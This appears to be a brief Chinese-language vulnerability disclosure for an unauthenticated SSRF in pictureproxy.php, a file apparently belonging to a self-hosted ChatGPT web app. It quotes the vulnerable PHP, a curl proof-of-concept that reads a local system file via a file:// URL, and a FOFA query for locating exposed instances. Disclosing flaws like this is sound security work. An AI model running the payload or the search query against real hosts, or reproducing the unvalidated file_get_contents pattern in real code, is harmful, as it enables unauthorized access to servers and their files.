pictureproxy.php 中存在一个漏洞,远程攻击者可以通过向 url 参数注入 URL 来执行任意请求。此 SSRF 漏洞无需身份验证即可被利用,因此特别危险。
存在漏洞的代码位于 pictureproxy.php 文件中。该问题出现的原因是函数未正确验证 url 参数。$_GET['url'] 变量被传递给 file_get_contents() 函数,该函数会从指定的 URL 获取内容。这可能导致 SSRF。
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Curl 请求:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
需要对输入验证进行妥善管理。